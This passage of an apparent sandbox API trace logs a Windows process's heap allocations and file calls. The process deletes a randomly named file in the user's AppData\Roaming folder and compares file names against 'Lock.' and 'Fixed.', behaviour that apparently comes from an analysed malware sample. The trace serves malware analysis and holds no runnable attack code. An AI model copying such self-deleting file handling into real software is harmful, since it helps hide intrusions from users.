Size=0x8) returned 0x2a722a8 [0149.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0149.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0149.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0149.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0149.900] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0149.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0149.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0149.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9250 [0149.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0149.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0149.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9220 [0149.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0149.901] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0149.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0149.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0149.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0149.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0149.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0149.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0149.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0149.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0149.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0149.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0149.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0149.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0149.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0149.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0149.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f60 [0149.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0149.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0149.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0149.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0149.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0149.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0149.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0149.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0149.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f60 | out: hHeap=0x2af0000) returned 1 [0149.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0149.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0149.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x56) returned 0x2a5fae0 [0149.901] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Pvmhff.flv", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\Pvmhff.flv", lpFilePart=0x8cedf4*="Pvmhff.flv") returned 0x2a [0149.902] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5fae0 | out: hHeap=0x2af0000) returned 1 [0149.902] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Pvmhff.flv" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\pvmhff.flv")) returned 0x20 [0149.902] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Pvmhff.flv", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef3560a0, ftCreationTime.dwHighDateTime=0x1d5c97f, ftLastAccessTime.dwLowDateTime=0x5010b180, ftLastAccessTime.dwHighDateTime=0x1d5cb93, ftLastWriteTime.dwLowDateTime=0x5010b180, ftLastWriteTime.dwHighDateTime=0x1d5cb93, nFileSizeHigh=0x0, nFileSizeLow=0x15b38, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Pvmhff.flv", cAlternateFileName="")) returned 0x9e1fb8 [0149.902] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Pvmhff.flv" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\pvmhff.flv")) returned 1 [0149.910] FindNextFileW (in: hFindFile=0x9e1fb8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef3560a0, ftCreationTime.dwHighDateTime=0x1d5c97f, ftLastAccessTime.dwLowDateTime=0x5010b180, ftLastAccessTime.dwHighDateTime=0x1d5cb93, ftLastWriteTime.dwLowDateTime=0x5010b180, ftLastWriteTime.dwHighDateTime=0x1d5cb93, nFileSizeHigh=0x0, nFileSizeLow=0x15b38, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Pvmhff.flv", cAlternateFileName="")) returned 0 [0149.910] FindClose (in: hFindFile=0x9e1fb8 | out: hFindFile=0x9e1fb8) returned 1 [0149.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0149.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0149.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0149.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0149.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0149.910] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0149.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0149.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0149.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0149.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0149.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0149.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0149.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0149.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0149.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0149.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0149.911] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0149.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0149.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0149.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa90e8 [0149.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0149.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0149.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9160 [0149.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0149.911] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0149.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0149.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0149.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0149.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0149.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0149.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0149.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0149.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0149.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0149.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0149.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0149.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0149.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0149.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0149.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f20 [0149.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0149.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0149.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0149.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0149.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0149.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0149.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0149.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0149.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f20 | out: hHeap=0x2af0000) returned 1 [0149.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0149.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0149.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0149.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0149.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0149.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0149.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0149.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0149.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0149.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0149.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0149.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0149.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0149.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x56) returned 0x2a5f6c0 [0149.912] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Pvmhff.flv", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\Pvmhff.flv", lpFilePart=0x8cf650*="Pvmhff.flv") returned 0x2a [0149.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5f6c0 | out: hHeap=0x2af0000) returned 1 [0149.912] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Pvmhff.flv" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\pvmhff.flv")) returned 0xffffffff [0149.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0149.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0149.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0149.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0149.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0149.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0149.913] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0149.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0149.913] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0149.913] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0149.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0149.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0149.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0149.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0149.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0149.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0149.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0149.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0149.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0149.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0149.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0149.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0149.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0149.913] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rCxPhCicoc5u7sEbYlz.ots", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0149.913] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CxPhCicoc5u7sEbYlz.ots", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0149.913] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xPhCicoc5u7sEbYlz.ots", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0149.913] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PhCicoc5u7sEbYlz.ots", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0149.913] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hCicoc5u7sEbYlz.ots", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0149.913] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Cicoc5u7sEbYlz.ots", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0149.913] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="icoc5u7sEbYlz.ots", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0149.913] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="coc5u7sEbYlz.ots", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0149.913] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oc5u7sEbYlz.ots", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0149.913] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c5u7sEbYlz.ots", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0149.913] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5u7sEbYlz.ots", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0149.913] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="u7sEbYlz.ots", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0149.913] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7sEbYlz.ots", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0149.914] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sEbYlz.ots", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0149.914] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EbYlz.ots", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0149.914] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bYlz.ots", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0149.914] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ylz.ots", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0149.914] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lz.ots", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0149.914] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z.ots", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0149.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0149.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0149.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0149.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0149.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0149.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0149.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0149.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0149.914] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0149.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0149.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0149.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0149.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0149.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0149.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0149.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0149.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0149.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0149.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0149.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0149.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0149.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0149.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0149.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0149.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0149.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0149.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0149.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa66f0 [0149.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722b8 [0149.915] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rCxPhCicoc5u7sEbYlz.ots", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0149.915] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CxPhCicoc5u7sEbYlz.ots", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0149.915] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xPhCicoc5u7sEbYlz.ots", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0149.915] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PhCicoc5u7sEbYlz.ots", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0149.915] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hCicoc5u7sEbYlz.ots", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0149.915] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Cicoc5u7sEbYlz.ots", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0149.915] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="icoc5u7sEbYlz.ots", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0149.915] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="coc5u7sEbYlz.ots", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0149.915] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oc5u7sEbYlz.ots", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0149.915] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c5u7sEbYlz.ots", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0149.915] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5u7sEbYlz.ots", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0149.915] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="u7sEbYlz.ots", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0149.915] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7sEbYlz.ots", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0149.915] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sEbYlz.ots", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0149.915] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EbYlz.ots", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0149.915] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bYlz.ots", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0149.915] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ylz.ots", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0149.915] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lz.ots", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0149.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0149.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6728 [0149.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0149.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6728 | out: hHeap=0x2af0000) returned 1 [0149.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0149.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 